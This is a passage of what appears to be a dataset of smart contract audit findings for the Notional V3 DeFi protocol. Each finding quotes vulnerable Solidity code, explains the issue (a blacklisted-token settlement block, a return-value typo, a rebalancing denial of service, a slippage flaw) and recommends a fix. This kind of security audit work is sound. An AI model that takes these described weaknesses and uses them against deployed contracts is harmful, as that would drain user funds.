didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n require(didSettle, ""No Settle"");\\n\\n vaultAccount.accruePrimeCashFeesToDebt(vaultConfig);\\n\\n // Skip Min Borrow Check so that accounts can always be settled\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: false});\\n\\n if (didTransfer) {\\n // If the vault did a transfer (i.e. withdrew cash) we have to check their collateral ratio. There\\n // is an edge condition where a vault with secondary borrows has an emergency exit. During that process\\n // an account will be left some cash balance in both currencies. It may have excess cash in one and\\n // insufficient cash in the other. A withdraw of the excess in one side will cause the vault account to\\n // be insolvent if we do not run this check. If this scenario indeed does occur, the vault itself must\\n // be upgraded in order to facilitate orderly exits for all of the accounts since they will be prevented\\n // from settling.\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n }\\n```\\n\\nas the comment suggests, this function should be called permissionless\\nand the comment is, which means there should not be able to permissionless reject account settlement\\n```\\n/// will first settle the vault account before taking any further actions.\\n```\\n\\nthis is calling\\n```\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n```\\n\\nwhich calls\\n```\\n /// @notice Settles a matured vault account by transforming it from an fCash maturity into\\n /// a prime cash account. This method is not authenticated, anyone can settle a vault account\\n /// without permission. Generally speaking, this action is economically equivalent no matter\\n /// when it is called. In some edge conditions when the vault is holding prime cash, it is\\n /// advantageous for the vault account to have this called sooner. All vault account actions\\n /// will first settle the vault account before taking any further actions.\\n /// @param account the address to settle\\n /// @param vault the vault the account is in\\n function settleVaultAccount(address account, address vault) external override nonReentrant {\\n requireValidAccount(account);\\n require(account != vault);\\n\\n VaultConfig memory vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n VaultAccount memory vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n \\n // Require that the account settled, otherwise we may leave the account in an unintended\\n // state in this method because we allow it to skip the min borrow check in the next line.\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n require(didSettle, ""No Settle"");\\n```\\n\\nbasically this calls\\n```\\n // Calculates the net settled cash if there is any temp cash balance that is net off\\n // against the settled prime debt.\\n bool didTransferPrimary;\\n (accountPrimeStorageValue, didTransferPrimary) = repayAccountPrimeDebtAtSettlement(\\n vaultConfig.primeRate,\\n primeVaultState,\\n vaultConfig.borrowCurrencyId,\\n vaultConfig.vault,\\n vaultAccount.account,\\n vaultAccount.tempCashBalance,\\n accountPrimeStorageValue\\n );\\n```\\n\\ncalling\\n```\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n didTransfer = false;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue;\\n \\n if (accountPrimeCash > 0) {\\n // netPrimeDebtRepaid is a negative number\\n int256 netPrimeDebtRepaid = pr.convertUnderlyingToDebtStorage(\\n pr.convertToUnderlying(accountPrimeCash).neg()\\n );\\n\\n int256 netPrimeDebtChange;\\n if (netPrimeDebtRepaid < accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue))\\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n // In this case, part of the account's debt is repaid.\\n netPrimeDebtChange = netPrimeDebtRepaid;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue.sub(netPrimeDebtRepaid);\\n }\\n```\\n\\nthe token withdrawal logic above try to push ETH to accout\\n```\\nTokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n);\\n```\\n\\nthis is calling\\n```\\n function withdrawPrimeCash(\\n address account,\\n uint16 currencyId,\\n int256 primeCashToWithdraw,\\n PrimeRate memory primeRate,\\n bool withdrawWrappedNativeToken\\n ) internal returns (int256 netTransferExternal) {\\n if (primeCashToWithdraw == 0) return 0;\\n require(primeCashToWithdraw < 0);\\n\\n Token memory underlying = getUnderlyingToken(currencyId);\\n netTransferExternal = convertToExternal(\\n underlying, \\n primeRate.convertToUnderlying(primeCashToWithdraw) \\n );\\n\\n // Overflow not possible due to int256\\n uint256 withdrawAmount = uint256(netTransferExternal.neg());\\n _redeemMoneyMarketIfRequired(currencyId, underlying, withdrawAmount);\\n\\n if (underlying.tokenType == TokenType.Ether) {\\n GenericToken.transferNativeTokenOut(account, withdrawAmount, withdrawWrappedNativeToken);\\n } else {\\n GenericToken.safeTransferOut(underlying.tokenAddress, account, withdrawAmount);\\n }\\n\\n _postTransferPrimeCashUpdate(account, currencyId, netTransferExternal, underlying, primeRate);\\n }\\n```\\n\\nnote the function call\\n```\\nif (underlying.tokenType == TokenType.Ether) {\\n GenericToken.transferNativeTokenOut(account, withdrawAmount, withdrawWrappedNativeToken);\\n} else {\\n GenericToken.safeTransferOut(underlying.tokenAddress, account, withdrawAmount);\\n}\\n```\\n\\nif the token type is not ETHER,\\nwe are transfer the underlying ERC20 token to the account\\n```\\nGenericToken.safeTransferOut(underlying.tokenAddress, account, withdrawAmount);\\n```\\n\\nthe token in-scoped is\\n```\\nERC20: Any Non-Rebasing token. ex. USDC, DAI, USDT (future), wstETH, WETH, WBTC, FRAX, CRV, etc.\\n```\\n\\nUSDC is common token that has blacklisted\\nif the account is blacklisted, the transfer would revert and the account cannot be settled!",maybe let admin bypass the withdrawPrimeCash and force settle the account to not let settlement block further action!,"what are the impact,\\nper comment\\n```\\n/// will first settle the vault account before taking any further actions.\\n```\\n\\nif that is too vague, I can list three, there are more!\\nthere are certain action that need to be done after the vault settlement, for example, liqudation require the vault settlement first\\nthere are case that require force vault settlement, actually one example is notional need to force the settle the vault during migration! (this is just the case to show user should be able to permissionless reject settlement)","```\\n /// @notice Settles a matured vault account by transforming it from an fCash maturity into\\n /// a prime cash account. This method is not authenticated, anyone can settle a vault account\\n /// without permission. Generally speaking, this action is economically equivalent no matter\\n /// when it is called. In some edge conditions when the vault is holding prime cash, it is\\n /// advantageous for the vault account to have this called sooner. All vault account actions\\n /// will first settle the vault account before taking any further actions.\\n /// @param account the address to settle\\n /// @param vault the vault the account is in\\n function settleVaultAccount(address account, address vault) external override nonReentrant {\\n requireValidAccount(account);\\n require(account != vault);\\n\\n VaultConfig memory vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n VaultAccount memory vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n \\n // Require that the account settled, otherwise we may leave the account in an unintended\\n // state in this method because we allow it to skip the min borrow check in the next line.\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n require(didSettle, ""No Settle"");\\n\\n vaultAccount.accruePrimeCashFeesToDebt(vaultConfig);\\n\\n // Skip Min Borrow Check so that accounts can always be settled\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: false});\\n\\n if (didTransfer) {\\n // If the vault did a transfer (i.e. withdrew cash) we have to check their collateral ratio. There\\n // is an edge condition where a vault with secondary borrows has an emergency exit. During that process\\n // an account will be left some cash balance in both currencies. It may have excess cash in one and\\n // insufficient cash in the other. A withdraw of the excess in one side will cause the vault account to\\n // be insolvent if we do not run this check. If this scenario indeed does occur, the vault itself must\\n // be upgraded in order to facilitate orderly exits for all of the accounts since they will be prevented\\n // from settling.\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n }\\n```\\n" +getAccountPrimeDebtBalance() always return 0,medium,"Spelling errors that result in `getAccountPrimeDebtBalance()` Always return 0\\n`getAccountPrimeDebtBalance()` use for Show current debt\\n```\\n function getAccountPrimeDebtBalance(uint16 currencyId, address account) external view override returns (\\n int256 debtBalance\\n ) {\\n mapping(address => mapping(uint256 => BalanceStorage)) storage store = LibStorage.getBalanceStorage();\\n BalanceStorage storage balanceStorage = store[account][currencyId];\\n int256 cashBalance = balanceStorage.cashBalance;\\n\\n // Only return cash balances less than zero\\n debtBalance = cashBalance < 0 ? debtBalance : 0; //<------@audit wrong, Always return 0\\n }\\n```\\n\\nIn the above code we can see that due to a spelling error, `debtBalance` always ==0 should use `debtBalance = cashBalance < 0 ? cashBalance : 0;`","```\\n function getAccountPrimeDebtBalance(uint16 currencyId, address account) external view override returns (\\n int256 debtBalance\\n ) {\\n mapping(address => mapping(uint256 => BalanceStorage)) storage store = LibStorage.getBalanceStorage();\\n BalanceStorage storage balanceStorage = store[account][currencyId];\\n int256 cashBalance = balanceStorage.cashBalance;\\n\\n // Only return cash balances less than zero\\n- debtBalance = cashBalance < 0 ? debtBalance : 0;\\n+ debtBalance = cashBalance < 0 ? cashBalance : 0;\\n }\\n```\\n","`getAccountPrimeDebtBalance()` is the external method to check the debt If a third party integrates with notional protocol, this method will be used to determine whether the user has debt or not and handle it accordingly, which may lead to serious errors in the third party's business","```\\n function getAccountPrimeDebtBalance(uint16 currencyId, address account) external view override returns (\\n int256 debtBalance\\n ) {\\n mapping(address => mapping(uint256 => BalanceStorage)) storage store = LibStorage.getBalanceStorage();\\n BalanceStorage storage balanceStorage = store[account][currencyId];\\n int256 cashBalance = balanceStorage.cashBalance;\\n\\n // Only return cash balances less than zero\\n debtBalance = cashBalance < 0 ? debtBalance : 0; //<------@audit wrong, Always return 0\\n }\\n```\\n" +A single external protocol can DOS rebalancing process,medium,"A failure in an external money market can DOS the entire rebalance process in Notional.\\n```\\nFile: ProportionalRebalancingStrategy.sol\\n function calculateRebalance(\\n IPrimeCashHoldingsOracle oracle,\\n uint8[] calldata rebalancingTargets\\n ) external view override onlyNotional returns (RebalancingData memory rebalancingData) {\\n address[] memory holdings = oracle.holdings();\\n..SNIP..\\n for (uint256 i; i < holdings.length;) {\\n address holding = holdings[i];\\n uint256 targetAmount = totalValue * rebalancingTargets[i] / uint256(Constants.PERCENTAGE_DECIMALS);\\n uint256 currentAmount = values[i];\\n\\n redeemHoldings[i] = holding;\\n depositHoldings[i] = holding;\\n..SNIP..\\n }\\n\\n rebalancingData.redeemData = oracle.getRedemptionCalldataForRebalancing(redeemHoldings, redeemAmounts);\\n rebalancingData.depositData = oracle.getDepositCalldataForRebalancing(depositHoldings, depositAmounts);\\n }\\n```\\n\\nDuring a rebalance, the `ProportionalRebalancingStrategy` will loop through all the holdings and perform a deposit or redemption against the external market of the holdings.\\nAssume that Notional integrates with four (4) external money markets (Aave V2, Aave V3, Compound V3, Morpho). In this case, whenever a rebalance is executed, Notional will interact with all four external money markets.\\n```\\nFile: TreasuryAction.sol\\n function _executeDeposits(Token memory underlyingToken, DepositData[] memory deposits) private {\\n..SNIP..\\n for (uint256 j; j < depositData.targets.length; ++j) {\\n // This will revert if the individual call reverts.\\n GenericToken.executeLowLevelCall(\\n depositData.targets[j], \\n depositData.msgValue[j], \\n depositData.callData[j]\\n );\\n }\\n```\\n\\n```\\nFile: TokenHandler.sol\\n function executeMoneyMarketRedemptions(\\n..SNIP..\\n for (uint256 j; j < data.targets.length; j++) {\\n // This will revert if the individual call reverts.\\n GenericToken.executeLowLevelCall(data.targets[j], 0, data.callData[j]);\\n }\\n```\\n\\nHowever, as long as one external money market reverts, the entire rebalance process will be reverted and Notional would not be able to rebalance its underlying assets.\\nThe call to the external money market can revert due to many reasons, which include the following:\\nChanges in the external protocol's interfaces (e.g. function signatures modified or functions added or removed)\\nThe external protocol is paused\\nThe external protocol has been compromised\\nThe external protocol suffers from an upgrade failure causing an error in the new contract code.","Consider implementing a more resilient rebalancing process that allows for failures in individual external money markets. For instance, Notional could catch reverts from individual money markets and continue the rebalancing process with the remaining markets.","Notional would not be able to rebalance its underlying holding if one of the external money markets causes a revert. The probability of this issue occurring increases whenever Notional integrates with a new external money market\\nThe key feature of Notional V3 is to allow its Treasury Manager to rebalance underlying holdings into various other money market protocols.\\nThis makes Notional more resilient to issues in external protocols and future-proofs the protocol. If rebalancing does not work, Notional will be unable to move its fund out of a vulnerable external market, potentially draining protocol funds if this is not mitigated.\\nAnother purpose of rebalancing is to allow Notional to allocate Notional V3's capital to new opportunities or protocols that provide a good return. If rebalancing does not work, the protocol and its users will lose out on the gain from the investment.\\nOn the other hand, if an external monkey market that Notional invested in is consistently underperforming or yielding negative returns, Notional will perform a rebalance to reallocate its funds to a better market. However, if rebalancing does not work, they will be stuck with a suboptimal asset allocation, and the protocol and its users will incur losses.","```\\nFile: ProportionalRebalancingStrategy.sol\\n function calculateRebalance(\\n IPrimeCashHoldingsOracle oracle,\\n uint8[] calldata rebalancingTargets\\n ) external view override onlyNotional returns (RebalancingData memory rebalancingData) {\\n address[] memory holdings = oracle.holdings();\\n..SNIP..\\n for (uint256 i; i < holdings.length;) {\\n address holding = holdings[i];\\n uint256 targetAmount = totalValue * rebalancingTargets[i] / uint256(Constants.PERCENTAGE_DECIMALS);\\n uint256 currentAmount = values[i];\\n\\n redeemHoldings[i] = holding;\\n depositHoldings[i] = holding;\\n..SNIP..\\n }\\n\\n rebalancingData.redeemData = oracle.getRedemptionCalldataForRebalancing(redeemHoldings, redeemAmounts);\\n rebalancingData.depositData = oracle.getDepositCalldataForRebalancing(depositHoldings, depositAmounts);\\n }\\n```\\n" +Inadequate slippage control,medium,"The current slippage control mechanism checks a user's acceptable interest rate limit against the post-trade rate, which could result in trades proceeding at rates exceeding the user's defined limit.\\n```\\nFile: InterestRateCurve.sol\\n function _getNetCashAmountsUnderlying(\\n InterestRateParameters memory irParams,\\n MarketParameters memory market,\\n CashGroupParameters memory cashGroup,\\n int256 totalCashUnderlying,\\n int256 fCashToAccount,\\n uint256 timeToMaturity\\n ) private pure returns (int256 postFeeCashToAccount, int256 netUnderlyingToMarket, int256 cashToReserve) {\\n uint256 utilization = getfCashUtilization(fCashToAccount, market.totalfCash, totalCashUnderlying);\\n // Do not allow utilization to go above 100 on trading\\n if (utilization > uint256(Constants.RATE_PRECISION)) return (0, 0, 0);\\n uint256 preFeeInterestRate = getInterestRate(irParams, utilization);\\n\\n int256 preFeeCashToAccount = fCashToAccount.divInRatePrecision(\\n getfCashExchangeRate(preFeeInterestRate, timeToMaturity)\\n ).neg();\\n\\n uint256 postFeeInterestRate = getPostFeeInterestRate(irParams, preFeeInterestRate, fCashToAccount < 0);\\n postFeeCashToAccount = fCashToAccount.divInRatePrecision(\\n getfCashExchangeRate(postFeeInterestRate, timeToMaturity)\\n ).neg();\\n```\\n\\nWhen executing a fCash trade, the interest rate is computed based on the utilization of the current market (Refer to Line 432). The `postFeeInterestRate` is then computed based on the `preFeeCashToAccount` and trading fee, and this rate will be used to derive the exchange rate needed to convert `fCashToAccount` to the net prime cash (postFeeCashToAccount).\\nNote that the interest rate used for the trade is `postFeeInterestRate`, and `postFeeCashToAccount` is the amount of cash credit or debit to an account.\\nIf there is any slippage control in place, the slippage should be checked against the `postFeeInterestRate` or `postFeeCashToAccount`. As such, there are two approaches to implementing slippage controls:\\n1st Approach - The current interest rate is `2%`. User sets their acceptable interest rate limit at 3% when the user submits the trade transaction. The user's tolerance is `1%`. From the time the trade is initiated to when it's executed, the rate (postFeeInterestRate) rises to 5%, the transaction should revert due to the increased slippage beyond the user's tolerance.\\n2nd Approach - If a user sets the minimum trade return of 1000 cash, but the return is only 900 cash (postFeeCashToAccount) when the trade is executed, the transaction should revert as it exceeded the user's slippage tolerance\\nNote: When users submit a trade transaction, the transaction is held in the mempool for a period of time before executing, and thus the market condition and interest rate might change during this period, and slippage control is used to protect users from these fluctuations.\\nHowever, within the codebase, it was observed that the slippage was not checked against the `postFeeInterestRate` or `postFeeCashToAccount`.\\n```\\nFile: InterestRateCurve.sol\\n // returns the net cash amounts to apply to each of the three relevant balances.\\n (\\n int256 netUnderlyingToAccount,\\n int256 netUnderlyingToMarket,\\n int256 netUnderlyingToReserve\\n ) = _getNetCashAmountsUnderlying(\\n irParams,\\n market,\\n cashGroup,\\n totalCashUnderlying,\\n fCashToAccount,\\n timeToMaturity\\n );\\n..SNIP..\\n {\\n // Do not allow utilization to go above 100 on trading, calculate the utilization after\\n // the trade has taken effect, meaning that fCash changes and cash changes are applied to\\n // the market totals.\\n market.totalfCash = market.totalfCash.subNoNeg(fCashToAccount);\\n totalCashUnderlying = totalCashUnderlying.add(netUnderlyingToMarket);\\n\\n uint256 utilization = getfCashUtilization(0, market.totalfCash, totalCashUnderlying);\\n if (utilization > uint256(Constants.RATE_PRECISION)) return (0, 0);\\n\\n uint256 newPreFeeImpliedRate = getInterestRate(irParams, utilization);\\n..SNIP..\\n // Saves the preFeeInterestRate and fCash\\n market.lastImpliedRate = newPreFeeImpliedRate;\\n }\\n```\\n\\nAfter computing the net prime cash (postFeeCashToAccount == netUnderlyingToAccount) at Line 373 above, it updates the `market.totalfCash` and `totalCashUnderlying`. Line 395 computes the `utilization` after the trade happens, and uses the latest `utilization` to compute the new interest rate after the trade and save it within the `market.lastImpliedRate`\\n```\\nFile: TradingAction.sol\\n function _executeLendBorrowTrade(\\n..SNIP..\\n cashAmount = market.executeTrade(\\n account,\\n cashGroup,\\n fCashAmount,\\n market.maturity.sub(blockTime),\\n marketIndex\\n );\\n\\n uint256 rateLimit = uint256(uint32(bytes4(trade << 104)));\\n if (rateLimit != 0) {\\n if (tradeType == TradeActionType.Borrow) {\\n // Do not allow borrows over the rate limit\\n require(market.lastImpliedRate <= rateLimit, ""Trade failed, slippage"");\\n } else {\\n // Do not allow lends under the rate limit\\n require(market.lastImpliedRate >= rateLimit, ""Trade failed, slippage"");\\n }\\n }\\n }\\n```\\n\\nThe trade is executed at Line 256 above. After the trade is executed, it will check for the slippage at Line 264-273 above.\\nLet $IR_1$ be the interest rate used during the trade (postFeeInterestRate), $IR_2$ be the interest rate after the trade (market.lastImpliedRate), and $IR_U$ be the user's acceptable interest rate limit (rateLimit).\\nBased on the current slippage control implementation, $IR_U$ is checked against $IR_2$. Since the purpose of having slippage control in DeFi trade is to protect users from unexpected and unfavorable price changes during the execution of a trade, $IR_1$ should be used instead.\\nAssume that at the time of executing a trade (TradeActionType.Borrow), $IR_1$ spikes up and exceeds $IR_U$. However, since the slippage control checks $IR_U$ against $IR_2$, which may have resettled to $IR_U$ or lower, the transaction proceeds despite exceeding the user's acceptable rate limit. So, the transaction succeeds without a revert.\\nThis issue will exacerbate when executing large trades relative to pool liquidity.",Consider updating the slippage control to compare the user's acceptable interest rate limit (rateLimit) against the interest rate used during the trade execution (postFeeInterestRate).,"The existing slippage control does not provide the desired protection against unexpected interest rate fluctuations during the transaction. As a result, users might be borrowing at a higher cost or lending at a lower return than they intended, leading to losses.","```\\nFile: InterestRateCurve.sol\\n function _getNetCashAmountsUnderlying(\\n InterestRateParameters memory irParams,\\n MarketParameters memory market,\\n CashGroupParameters memory cashGroup,\\n int256 totalCashUnderlying,\\n int256 fCashToAccount,\\n uint256 timeToMaturity\\n ) private pure returns (int256 postFeeCashToAccount, int256 netUnderlyingToMarket, int256 cashToReserve) {\\n uint256 utilization = getfCashUtilization(fCashToAccount, market.totalfCash, totalCashUnderlying);\\n // Do not allow utilization to go above 100 on trading\\n if (utilization > uint256(Constants.RATE_PRECISION)) return (0, 0, 0);\\n uint256 preFeeInterestRate = getInterestRate(irParams, utilization);\\n\\n int256 preFeeCashToAccount = fCashToAccount.divInRatePrecision(\\n getfCashExchangeRate(preFeeInterestRate, timeToMaturity)\\n ).neg();\\n\\n uint256 postFeeInterestRate = getPostFeeInterestRate(irParams, preFeeInterestRate, fCashToAccount < 0);\\n postFeeCashToAccount = fCashToAccount.divInRatePrecision(\\n getfCashExchangeRate(postFeeInterestRate, timeToMaturity)\\n ).neg();\\n```\\n" +Inconsistent use of `VAULT_ACCOUNT_MIN_TIME` in vault implementation,medium,"There is a considerable difference in implementation behaviour when a vault has yet to mature compared to after vault settlement.\\nThere is some questionable functionality with the following `require` statement:\\n```\\nFile: VaultAccountAction.sol\\n require(vaultAccount.lastUpdateBlockTime + Constants.VAULT_ACCOUNT_MIN_TIME <= block.timestamp)\\n```\\n\\nThe `lastUpdateBlockTime` variable is updated in two cases:\\nA user enters a vault position, updating the vault state; including `lastUpdateBlockTime`. This is a proactive measure to prevent users from quickly entering and exiting the vault.\\nThe vault has matured and as a result, each time vault fees are assessed for a given vault account, `lastUpdateBlockTime` is updated to `block.timestamp` after calculating the pro-rated fee for the prime cash vault.\\nTherefore, before a vault has matured, it is not possible to quickly enter and exit a vault. But after `Constants.VAULT_ACCOUNT_MIN_TIME` has passed, the user can exit the vault as many times as they like. However, the same does not hold true once a vault has matured. Each time a user exits the vault, they must wait `Constants.VAULT_ACCOUNT_MIN_TIME` time again to re-exit. This seems like inconsistent behaviour.","It might be worth adding an exception to `VaultConfiguration.settleAccountOrAccruePrimeCashFees()` so that when vault fees are calculated, `lastUpdatedBlockTime` is not updated to `block.timestamp`.",The `exitVault()` function will ultimately affect prime and non-prime vault users differently. It makes sense for the codebase to be written in such a way that functions execute in-line with user expectations.,```\\nFile: VaultAccountAction.sol\\n require(vaultAccount.lastUpdateBlockTime + Constants.VAULT_ACCOUNT_MIN_TIME <= block.timestamp)\\n```\\n +Return data from the external call not verified during deposit and redemption,medium,"The deposit and redemption functions did not verify the return data from the external call, which might cause the contract to wrongly assume that the deposit/redemption went well although the action has actually failed in the background.\\n```\\nFile: GenericToken.sol\\n function executeLowLevelCall(\\n address target,\\n uint256 msgValue,\\n bytes memory callData\\n ) internal {\\n (bool status, bytes memory returnData) = target.call{value: msgValue}(callData);\\n require(status, checkRevertMessage(returnData));\\n }\\n```\\n\\nWhen the external call within the `GenericToken.executeLowLevelCall` function reverts, the `status` returned from the `.call` will be `false`. In this case, Line 69 above will revert.\\n```\\nFile: TreasuryAction.sol\\n for (uint256 j; j < depositData.targets.length; ++j) {\\n // This will revert if the individual call reverts.\\n GenericToken.executeLowLevelCall(\\n depositData.targets[j], \\n depositData.msgValue[j], \\n depositData.callData[j]\\n );\\n }\\n```\\n\\nFor deposit and redeem, Notional assumes that all money markets will revert if the deposit/mint and redeem/burn has an error. Thus, it does not verify the return data from the external call. Refer to the comment in Line 317 above.\\nHowever, this is not always true due to the following reasons:\\nSome money markets might not revert when errors occur but instead return `false (0)`. In this case, the current codebase will wrongly assume that the deposit/redemption went well although the action has failed.\\nCompound might upgrade its contracts to return errors instead of reverting in the future.","Consider checking the `returnData` to ensure that the external money market returns a successful response after deposit and redemption.\\nNote that the successful response returned from various money markets might be different. Some protocols return `1` on a successful action, while Compound return zero (NO_ERROR).","The gist of prime cash is to integrate with multiple markets. Thus, the codebase should be written in a manner that can handle multiple markets. Otherwise, the contract will wrongly assume that the deposit/redemption went well although the action has actually failed in the background, which might potentially lead to some edge cases where assets are sent to the users even though the redemption fails.","```\\nFile: GenericToken.sol\\n function executeLowLevelCall(\\n address target,\\n uint256 msgValue,\\n bytes memory callData\\n ) internal {\\n (bool status, bytes memory returnData) = target.call{value: msgValue}(callData);\\n require(status, checkRevertMessage(returnData));\\n }\\n```\\n" +Treasury rebalance will fail due to interest accrual,medium,"If Compound has updated their interest rate model, then Notional will calculate the before total underlying token balance without accruing interest. If this exceeds `Constants.REBALANCING_UNDERLYING_DELTA`, then rebalance execution will revert.\\nThe `TreasuryAction._executeRebalance()` function will revert on a specific edge case where `oracle.getTotalUnderlyingValueStateful()` does not accrue interest before calculating the value of the treasury's `cToken` holdings.\\n```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n\\n`cTokenAggregator.getExchangeRateView()` returns the exchange rate which is used to calculate the underlying value of `cToken` holdings in two ways:\\nIf the interest rate model is unchanged, then we correctly accrue interest by calculating it without mutating state.\\nIf the interest rate model HAS changed, then we query `cToken.exchangeRateStored()` which DOES NOT accrue interest.\\n```\\nFile: cTokenAggregator.sol\\n function getExchangeRateView() external view override returns (int256) {\\n // Return stored exchange rate if interest rate model is updated.\\n // This prevents the function from returning incorrect exchange rates\\n uint256 exchangeRate = cToken.interestRateModel() == INTEREST_RATE_MODEL\\n ? _viewExchangeRate()\\n : cToken.exchangeRateStored();\\n _checkExchangeRate(exchangeRate);\\n\\n return int256(exchangeRate);\\n }\\n```\\n\\nTherefore, if the interest rate model has changed, `totalUnderlyingValueBefore` will not include any accrued interest and `totalUnderlyingValueAfter` will include all accrued interest. As a result, it is likely that the delta between these two amounts will exceed `Constants.REBALANCING_UNDERLYING_DELTA`, causing the rebalance to ultimately revert.\\nIt does not really make sense to not accrue interest if the interest rate model has changed unless we want to avoid any drastic changes to Notional's underlying protocol. Then we may want to explicitly revert here instead of allowing the rebalance function to still execute.","Ensure this is well-understand and consider accruing interest under any circumstance. Alternatively, if we do not wish to accrue interest when the interest rate model has changed, then we need to make sure that `underlyingDelta` does not include this amount as `TreasuryAction._executeDeposits()` will ultimately update the vault's position in Compound.",The treasury manager is unable to rebalance currencies across protocols and therefore it is likely that most funds become under-utilised as a result.,"```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n" +Debt cannot be repaid without redeeming vault share,medium,"Debt cannot be repaid without redeeming the vault share. As such, users have to redeem a certain amount of vault shares/strategy tokens at the current market price to work around this issue, which deprives users of potential gains from their vault shares if they maintain ownership until the end.\\n```\\nFile: VaultAccountAction.sol\\n function exitVault(\\n address account,\\n address vault,\\n address receiver,\\n uint256 vaultSharesToRedeem,\\n uint256 lendAmount,\\n uint32 minLendRate,\\n bytes calldata exitVaultData\\n ) external payable override nonReentrant returns (uint256 underlyingToReceiver) {\\n..SNIP..\\n // If insufficient strategy tokens are redeemed (or if it is set to zero), then\\n // redeem with debt repayment will recover the repayment from the account's wallet\\n // directly.\\n underlyingToReceiver = underlyingToReceiver.add(vaultConfig.redeemWithDebtRepayment(\\n vaultAccount, receiver, vaultSharesToRedeem, exitVaultData\\n ));\\n```\\n\\nThere is a valid scenario where users want to repay debt without redeeming their vault shares/strategy tokens (mentioned in the comments above ""or if it is set to zero"" at Line 251-263). In this case, the users will call `exitVault` with `vaultSharesToRedeem` parameter set to zero. The entire debt to be repaid will then be recovered directly from the account's wallet.\\nFollowing is the function trace of the VaultAccountAction.exitVault:\\n```\\nVaultAccountAction.exitVault\\n└─VaultConfiguration.redeemWithDebtRepayment\\n └─VaultConfiguration._redeem\\n └─IStrategyVault.redeemFromNotional\\n └─MetaStable2TokenAuraVault._redeemFromNotional\\n └─MetaStable2TokenAuraHelper.redeem\\n └─Balancer2TokenPoolUtils._redeem\\n └─StrategyUtils._redeemStrategyTokens\\n```\\n\\n```\\nFile: StrategyUtils.sol\\n function _redeemStrategyTokens(\\n StrategyContext memory strategyContext,\\n uint256 strategyTokens\\n ) internal returns (uint256 poolClaim) {\\n poolClaim = _convertStrategyTokensToPoolClaim(strategyContext, strategyTokens);\\n\\n if (poolClaim == 0) {\\n revert Errors.ZeroPoolClaim();\\n }\\n```\\n\\nThe problem is that if the vault shares/strategy tokens to be redeemed are zero, the `poolClaim` will be zero and cause a revert within the `StrategyUtils._redeemStrategyTokens` function call. Thus, users who want to repay debt without redeeming their vault shares/strategy tokens will be unable to do so.","Within the `VaultConfiguration.redeemWithDebtRepayment` function, skip the vault share redemption if `vaultShares` is zero. In this case, the `amountTransferred` will be zero, and the subsequent code will attempt to recover the entire `underlyingExternalToRepay` amount directly from account's wallet.\\n```\\nfunction redeemWithDebtRepayment(\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n address 